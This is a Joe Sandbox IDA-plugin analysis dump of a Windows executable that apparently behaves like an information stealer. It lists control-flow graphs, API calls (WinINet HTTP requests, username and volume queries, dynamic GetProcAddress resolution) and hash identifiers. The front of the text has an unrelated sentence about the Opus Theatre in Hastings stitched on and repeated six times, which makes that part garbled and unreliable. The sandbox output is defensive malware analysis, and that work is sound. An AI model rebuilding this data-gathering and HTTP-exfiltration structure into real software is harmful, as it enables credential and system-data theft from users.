Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                              • API String ID: 2127927946-2218711628
                                              • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                              • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                              • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 769 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 784 404994 769->784 785 40499b-40499f 769->785 784->785 786 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 785->786 787 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 785->787 786->787 873 404b23-404b27 786->873 797 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 787->797 798 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 787->798 798->797 874 404b35 873->874 875 404b29-404b33 873->875 876 404b3f-404b72 HttpOpenRequestA 874->876 875->876 877 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 876->877 878 404f0e-404f15 InternetCloseHandle 876->878 989 404e82-404eac InternetReadFile 877->989 878->787 990 404eb7-404f09 InternetCloseHandle call 41ab10 989->990 991 404eae-404eb5 989->991 990->878 991->990 992 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 991->992 992->989
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 0040498A
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,02CA7288), ref: 00404E38
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                              • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                              • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                              • HttpOpenRequestA.WININET(00000000,02CA7328,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 00404B65
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                              • String ID: "$"$------$------$------
                                              • API String ID: 2402878923-2180234286
                                              • Opcode ID: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                              • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                              • Opcode Fuzzy Hash: 927139e4ff79dcccf89a947fe60bb3502d149b71191b8262adec89c01fc198ea
                                              • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocNameProcessUser
                                              • String ID:
                                              • API String ID: 1206570057-0
                                              • Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                              • Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
                                              • Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
                                              • Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                              • ExitProcess.KERNEL32 ref: 0040117E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitInfoProcessSystem
                                              • String ID:
                                              • API String ID: 752954902-0
                                              • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                              • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                              • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                              • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 665 419bb0-419bc4 call 419aa0 668 419de3-419e42 LoadLibraryA * 5 665->668 669 419bca-419dde call 419ad0 GetProcAddress * 21 665->669 670 419e44-419e58 GetProcAddress 668->670 671 419e5d-419e64 668->671 669->668 670->671 674 419e96-419e9d 671->674 675 419e66-419e91 GetProcAddress * 2 671->675 676 419eb8-419ebf 674->676 677 419e9f-419eb3 GetProcAddress 674->677 675->674 678 419ec1-419ed4 GetProcAddress 676->678 679 419ed9-419ee0 676->679 677->676 678->679 680 419f11-419f12 679->680 681 419ee2-419f0c GetProcAddress * 2 679->681 681->680
                                              APIs
                                              • GetProcAddress.KERNEL32(75900000,02C227A8), ref: 00419BF1
                                              • GetProcAddress.KERNEL32(75900000,02C22970), ref: 00419C0A
                                              • GetProcAddress.KERNEL32(75900000,02C229D0), ref: 00419C22
                                              • GetProcAddress.KERNEL32(75900000,02C22988), ref: 00419C3A
                                              • GetProcAddress.KERNEL32(75900000,02C229A0), ref: 00419C53
                                              • GetProcAddress.KERNEL32(75900000,02C9D518), ref: 00419C6B
                                              • GetProcAddress.KERNEL32(75900000,02C9CBC0), ref: 00419C83
                                              • GetProcAddress.KERNEL32(75900000,02C9CA80), ref: 00419C9C
                                              • GetProcAddress.KERNEL32(75900000,02C22A00), ref: 00419CB4
                                              • GetProcAddress.KERNEL32(75900000,02C229E8), ref: 00419CCC
                                              • GetProcAddress.KERNEL32(75900000,02C22940), ref: 00419CE5
                                              • GetProcAddress.KERNEL32(75900000,02C229B8), ref: 00419CFD
                                              • GetProcAddress.KERNEL32(75900000,02C9CA20), ref: 00419D15
                                              • GetProcAddress.KERNEL32(75900000,02C22958), ref: 00419D2E
                                              • GetProcAddress.KERNEL32(75900000,02C9E920), ref: 00419D46
                                              • GetProcAddress.KERNEL32(75900000,02C9C9A0), ref: 00419D5E
                                              • GetProcAddress.KERNEL32(75900000,02C9EA58), ref: 00419D77
                                              • GetProcAddress.KERNEL32(75900000,02C9E998), ref: 00419D8F
                                              • GetProcAddress.KERNEL32(75900000,02C9CB00), ref: 00419DA7
                                              • GetProcAddress.KERNEL32(75900000,02C9EAA0), ref: 00419DC0
                                              • GetProcAddress.KERNEL32(75900000,02C9CAA0), ref: 00419DD8
                                              • LoadLibraryA.KERNEL32(02C9E968,?,00416CA0), ref: 00419DEA
                                              • LoadLibraryA.KERNEL32(02C9E890,?,00416CA0), ref: 00419DFB
                                              • LoadLibraryA.KERNEL32(02C9E9B0,?,00416CA0), ref: 00419E0D
                                              • LoadLibraryA.KERNEL32(02C9EAB8,?,00416CA0), ref: 00419E1F
                                              • LoadLibraryA.KERNEL32(02C9E8F0,?,00416CA0), ref: 00419E30
                                              • GetProcAddress.KERNEL32(75070000,02C9EA40), ref: 00419E52
                                              • GetProcAddress.KERNEL32(75FD0000,02C9E848), ref: 00419E73
                                              • GetProcAddress.KERNEL32(75FD0000,02C9E7E8), ref: 00419E8B
                                              • GetProcAddress.KERNEL32(75A50000,02C9E878), ref: 00419EAD
                                              • GetProcAddress.KERNEL32(74E50000,02C9CC20), ref: 00419ECE
                                              • GetProcAddress.KERNEL32(76E80000,02C9D578), ref: 00419EEF
                                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419F06
                                              Strings
                                              • NtQueryInformationProcess, xrefs: 00419EFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: NtQueryInformationProcess
                                              • API String ID: 2238633743-2781105232
                                              • Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction ID: 85c76ffc39373860cb8090e471c59d53cf6ad49422061259caa86ebb7f60cad9
                                              • Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
                                              • Instruction Fuzzy Hash: 4DA16FB5D0A2549FC344DFA8FC889567BBBA74D301708A61BF909C3674E734AA40CF62

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1001 4062d0-40635b call 41aab0 call 404800 call 41aa50 InternetOpenA StrCmpCA 1008 406364-406368 1001->1008 1009 40635d 1001->1009 1010 406559-406575 call 41aab0 call 41ab10 * 2 1008->1010 1011 40636e-406392 InternetConnectA 1008->1011 1009->1008 1030 406578-40657d 1010->1030 1012 406398-40639c 1011->1012 1013 40654f-406553 InternetCloseHandle 1011->1013 1015 4063aa 1012->1015 1016 40639e-4063a8 1012->1016 1013->1010 1018 4063b4-4063e2 HttpOpenRequestA 1015->1018 1016->1018 1020 406545-406549 InternetCloseHandle 1018->1020 1021 4063e8-4063ec 1018->1021 1020->1013 1023 406415-406455 HttpSendRequestA HttpQueryInfoA 1021->1023 1024 4063ee-40640f InternetSetOptionA 1021->1024 1026 406457-406477 call 41aa50 call 41ab10 * 2 1023->1026 1027 40647c-40649b call 418ad0 1023->1027 1024->1023 1026->1030 1034 406519-406539 call 41aa50 call 41ab10 * 2 1027->1034 1035 40649d-4064a4 1027->1035 1034->1030 1037 4064a6-4064d0 InternetReadFile 1035->1037 1038 406517-40653f InternetCloseHandle 1035->1038 1041 4064d2-4064d9 1037->1041 1042 4064db 1037->1042 1038->1020 1041->1042 1047 4064dd-406515 call 41acc0 call 41abb0 call 41ab10 1041->1047 1042->1038 1047->1037
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406353
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • HttpOpenRequestA.WININET(00000000,GET,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                              • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                              • InternetCloseHandle.WININET(00000000), ref: 00406549
                                              • InternetCloseHandle.WININET(00000000), ref: 00406553
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID: ERROR$ERROR$FUA$GET
                                              • API String ID: 3074848878-1334267432
                                              • Opcode ID: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                              • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                              • Opcode Fuzzy Hash: f3f7255e0d2dc24356a6d92e3ef249651165f71d209c9760ff987d984a1e72ad
                                              • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1058 4119f0-411a1d call 41ade0 StrCmpCA 1061 411a27-411a41 call 41ade0 strtok_s 1058->1061 1062 411a1f-411a21 ExitProcess 1058->1062 1065 411a44-411a48 1061->1065 1066 411c12-411c1d call 41ab10 1065->1066 1067 411a4e-411a61 1065->1067 1069 411a67-411a6a 1067->1069 1070 411bee-411c0d strtok_s 1067->1070 1072 411b41-411b52 StrCmpCA 1069->1072 1073 411ba1-411bb2 StrCmpCA 1069->1073 1074 411bc0-411bd1 StrCmpCA 1069->1074 1075 411b63-411b74 StrCmpCA 1069->1075 1076 411b82-411b93 StrCmpCA 1069->1076 1077 411a85-411a94 call 41ab30 1069->1077 1078 411aad-411abe StrCmpCA 1069->1078 1079 411acf-411ae0 StrCmpCA 1069->1079 1080 411a71-411a80 call 41ab30 1069->1080 1081 411a99-411aa8 call 41ab30 1069->1081 1082 411afd-411b0e StrCmpCA 1069->1082 1083 411b1f-411b30 StrCmpCA 1069->1083 1084 411bdf-411be9 call 41ab30 1069->1084 1070->1065 1098 411b54-411b57 1072->1098 1099 411b5e 1072->1099 1104 411bb4-411bb7 1073->1104 1105 411bbe 1073->1105 1085 411bd3-411bd6 1074->1085 1086 411bdd 1074->1086 1100 411b80 1075->1100 1101 411b76-411b79 1075->1101 1102 411b95-411b98 1076->1102 1103 411b9f 1076->1103 1077->1070 1090 411ac0-411ac3 1078->1090 1091 411aca 1078->1091 1092 411ae2-411aec 1079->1092 1093 411aee-411af1 1079->1093 1080->1070 1081->1070 1094 411b10-411b13 1082->1094 1095 411b1a 1082->1095 1096 411b32-411b35 1083->1096 1097 411b3c 1083->1097 1084->1070 1085->1086 1086->1070 1090->1091 1091->1070 1110 411af8 1092->1110 1093->1110 1094->1095 1095->1070 1096->1097 1097->1070 1098->1099 1099->1070 1100->1070 1101->1100 1102->1103 1103->1070 1104->1105 1105->1070 1110->1070
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessstrtok_s
                                              • String ID: block
                                              • API String ID: 3407564107-2199623458
                                              • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                              • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                              • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                              • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1111 415760-4157c7 call 415d20 call 41ab30 * 3 call 41aa50 * 4 1127 4157cc-4157d3 1111->1127 1128 4157d5-415806 call 41ab30 call 41aab0 call 401590 call 415440 1127->1128 1129 415827-41589c call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1127->1129 1144 41580b-415822 call 41abb0 call 41ab10 1128->1144 1155 4158e3-4158f9 call 41ade0 StrCmpCA 1129->1155 1159 41589e-4158de call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1129->1159 1144->1155 1160 415a2c-415a94 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1155->1160 1161 4158ff-415906 1155->1161 1159->1155 1290 415d13-415d16 1160->1290 1163 415a2a-415aaf call 41ade0 StrCmpCA 1161->1163 1164 41590c-415913 1161->1164 1183 415be1-415c49 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1163->1183 1184 415ab5-415abc 1163->1184 1167 415915-415969 call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1164->1167 1168 41596e-4159e3 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1164->1168 1167->1163 1168->1163 1267 4159e5-415a25 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1168->1267 1183->1290 1189 415ac2-415ac9 1184->1189 1190 415bdf-415c64 call 41ade0 StrCmpCA 1184->1190 1196 415b23-415b98 call 41aa50 * 2 call 401590 call 415510 call 41abb0 call 41ab10 call 41ade0 StrCmpCA 1189->1196 1197 415acb-415b1e call 41ab30 call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1189->1197 1219 415c66-415c71 Sleep 1190->1219 1220 415c78-415ce1 call 41abb0 call 41ab30 * 2 call 4016b0 call 41ab10 * 4 call 401670 call 401550 1190->1220 1196->1190 1295 415b9a-415bda call 41aab0 call 401590 call 415440 call 41abb0 call 41ab10 1196->1295 1197->1190 1219->1127 1220->1290 1267->1163 1295->1190
                                              APIs
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                              • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                              • API String ID: 3630751533-2791005934
                                              • Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                              • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                              • Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                              • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1322 417690-4176da GetWindowsDirectoryA 1323 4176e3-417757 GetVolumeInformationA call 418e90 * 3 1322->1323 1324 4176dc 1322->1324 1331 417768-41776f 1323->1331 1324->1323 1332 417771-41778a call 418e90 1331->1332 1333 41778c-4177a7 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 4177a9-4177b6 call 41aa50 1333->1335 1336 4177b8-4177e8 wsprintfA call 41aa50 1333->1336 1343 41780e-41781e 1335->1343 1336->1343
                                              APIs
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                              • wsprintfA.USER32 ref: 004177D0
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
